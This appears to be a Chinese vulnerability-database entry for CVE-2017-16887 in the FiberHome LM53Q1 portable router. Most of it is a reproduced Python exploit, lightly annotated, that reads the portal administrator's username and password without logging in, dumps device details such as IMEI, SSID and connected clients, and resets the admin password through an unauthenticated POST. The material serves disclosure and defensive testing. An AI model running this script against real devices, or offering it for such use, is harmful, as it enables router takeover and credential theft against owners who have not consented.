FiberHome Mobile WIFI Device LM53Q1 安全漏洞

漏洞ID 1131779 漏洞类型
发布时间 2018-01-08 更新时间 2019-09-02
CVE编号 CVE-2017-16887 CNNVD-ID CNNVD-201711-804
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2018010078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201711-804
|漏洞详情
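FiberHome Mobile WIFI Device LM53Q1是中国烽火(FiberHome)公司的一款便携式路由器设备。 FiberHome Mobile WIFI Device LM53Q1 VH519R05C01S38版本中的portal存在安全漏洞。攻击者可利用该漏洞获取WLAN密钥/密码。本页未列出修复版本或厂商补丁信息;下方EXP的文件头同时标注了CVE-2017-16885、CVE-2017-16886和CVE-2017-16887三个编号,而本条目仅对应CVE-2017-16887。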
|漏洞EXP
#!/usr/bin/python

# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC

import requests,sys,getopt,socket,struct

#Declaring IP as our global variable to probe for Gateway IP of Device
# NOTE: a `global` statement at module level has no effect. `ip` becomes a
# module-level name simply by being assigned further down in this file.
global ip

#Getting Gateway IP Address
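def get_default_gateway_linux():
    """Return the IPv4 default gateway listed in /proc/net/route, or None.

    Each row of the file is split on whitespace. Column 1 is read as the
    destination, column 2 as the gateway and column 3 as the flags word, all
    in hexadecimal. The first row whose destination is 00000000 and whose
    flags have bit 0x2 set is used.

    Returns:
        The gateway as a dotted-quad string, or None when no row matches.

    Raises:
        IOError: if /proc/net/route cannot be opened.
    """
    with open("/proc/net/route") as fh:
        for line in fh:
            fields = line.split()
            # Skip blank or truncated rows instead of failing with IndexError.
            if len(fields) < 4:
                continue
            # The header row is rejected here too: its destination column is
            # the word "Destination", so the hex conversion is never reached.
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            # NOTE(review): the address is packed little-endian, which
            # presumably assumes a little-endian host - confirm.
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    # No default route found. Indented with spaces like the rest of the
    # function: the original tab here is a TabError on Python 3.
    return None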


# Resolved once when the file is loaded. The helper returns None when no
# default route is found, and the URL concatenations that use `ip` would
# then raise TypeError.
ip = get_default_gateway_linux()

# Banner text for the interactive menu.
exploit_title = (
    "=============================================== \n"
    " FiberHome Remote Administrator Account Details \n"
    "================================================"
)


#Function to get Device Statistics 
def get_device_details():
	"""Fetch the portal's `status1` file and print selected fields from it.

	The GET goes to the fixed address 192.168.8.1 and the call passes no
	credentials, cookies or extra headers. The body is scanned line by line
	for known tags; each value is whatever remains after the tags are removed.

	The summary block is printed when an <IMEI> line is reached, using the
	values collected so far. A field that has not been seen by then is still
	None, and concatenating it would raise TypeError.
	NOTE(review): this assumes <IMEI> follows the other tags in the response
	- confirm against a real response.

	A <known_devices_list> line is printed separately as the list of
	connected devices. Returns None.

	Defensive reading: everything printed here (IMEI, SSID, DNS servers,
	connected devices) comes back from one GET that carried no credentials,
	so this request path is what to watch for in traffic from WLAN clients
	and what to re-test after any firmware update.
	"""

	# Defaults for fields that may be absent from the response.
	# `gateway` is initialised twice and `imei` has no default at all.
	gateway = None
	hardware = None
	device_name = None
	devices_all = ''
	version = None
	gateway = None
	ssid = ''
	dns1 = None
	dns2 = None


	# Fixed address: this helper does not use the module-level `ip`.
	requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
	api_response = requestStatus.content.replace('\t','').split('\n')
	for results in api_response:
        	if "<hardware_version>" in results:
                	hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
        	if "<device_name>" in results:
                	device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
        	if "<version_num>" in results:
                	version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
        	if "<gateway>" in results:
                	gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
        	# Spaces are kept for the SSID, unlike the other fields.
        	if "<ssid>" in results:
                	ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
        	if "<dns1>" in results:
                	dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
        	if "<dns2>" in results:
                	dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
        	# The whole summary is printed from inside this branch, so nothing is shown without an <IMEI> line.
        	if "<IMEI>" in results:
                	imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
                	print "\n=============================================="

                	print "\nHardware Version of Device : "+hardware+"\n"
                	print "\nName of Device : "+device_name+"\n"
               		print "\nSoftware Version of Device : "+version+"\n"
               		print "\nIMEI of Device! : "+imei+"\n"
              		print "\nWiFi SSID of Device : "+ssid+"\n"
	                print "\nGateway of Zong Device : "+gateway+"\n"
              		print "\nDNS Primary of Device : "+dns1+"\n"
		        print "\nDNS Secondary of Device : "+dns2+"\n"
	                print "\n=============================================================================\n";
	        if "<known_devices_list>" in results:
               		devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
               		print "\nConnected Devices to WIFI\n"
               		print devices_all


#Function for getting User Account Details to login to Portal
def get_user_account_details():
	"""Fetch the portal's `admin` file from the gateway and print the login it contains.

	The GET is built from the module-level `ip` and passes no credentials,
	cookies or extra headers. The response is scanned line by line; the text
	inside <router_username> and <router_password> is used as-is, with no
	decoding step, and both values are printed when the password line is
	reached.

	`username` is only bound once a <router_username> line has been seen; if
	the password line came first the print would fail with a NameError.
	Returns None.

	Defensive reading: per the advisory text on this page, the portal of
	firmware VH519R05C01S38 lets an attacker obtain the WLAN key/password.
	What this helper shows is the administrator login being read from a
	single GET with no prior login. NOTE(review): whether the device stores
	or returns the password in any protected form is not visible here.
	"""
	request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
	admin_details = request.content.replace('\t','').split('\n')
	for admin_login_response in admin_details:
        	if "<router_username>" in admin_login_response:
                	username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
        	# Output happens in the password branch only.
        	if "<router_password>" in admin_login_response:
                	password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
                	print "\nUsername of Device Web Application :\n"+username+" "
                	print "Password of Device Web Application :\n"+password+"\n"
                	print "\n=============================================================================\n";


#Function to change Administrator Password 

def change_admin_password():
	"""Prompt for a new value and POST it to the portal as the router password.

	The typed text is concatenated into an XML document under
	<RGW><management><router_password> without any escaping, and sent with
	Content-Type application/xml to the `method=set ... file=admin` URL on the
	module-level `ip`. The call passes no credentials, cookies or current
	password.

	The response text is stored in `change_password_request` but never
	inspected: the success message is printed whatever the device replied,
	and an HTTP error status is not detected. Returns None.

	Defensive reading: a state-changing request that is accepted without the
	current password or a session is the condition to test for on a device
	you administer. NOTE(review): the page does not say which of the three
	CVE ids in the file header covers this behaviour.
	"""
	set_password = raw_input("\nEnter Password to Change : ")
	# raw_input() already returns a str on Python 2, so this conversion is a no-op.
	password = str(set_password)
	xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
	headers = {'Content-Type': 'application/xml'} 
	# The reply is captured here but nothing below reads it.
	change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
	print "Password Changed!"


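def main():
    """Print the banner and menu, then run the helper the operator selects.

    The choice is compared as the raw string typed at the prompt. Options
    "1" and "2" wait for one more line of input after the helper returns;
    option "3" returns as soon as the helper does. Blank or unrecognised
    input prints a farewell message. Returns None.
    """
    print exploit_title
    print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"

    get_option = raw_input("\n Enter Option :  ")

    # The choice is matched as a string. The earlier int(get_option) result was
    # never used and raised ValueError on blank or non-numeric input, which made
    # the blank-input branch below unreachable.
    if get_option == "1":
        get_user_account_details()
        raw_input("\n Press Any Key To Exit")
    elif get_option == "2":
        get_device_details()
        raw_input("\n Press Any Key To Exit")
    elif get_option == "3":
        change_admin_password()
    elif get_option == "":
        print "Good Bye!"
    else:
        print "Goodbye!"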

# Runs the menu unconditionally: there is no `if __name__ == "__main__":`
# guard, so importing this file also starts the prompt.
main()
|参考资料

来源:FULLDISC
链接:http://seclists.org/fulldisclosure/2018/Jan/28
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/43460/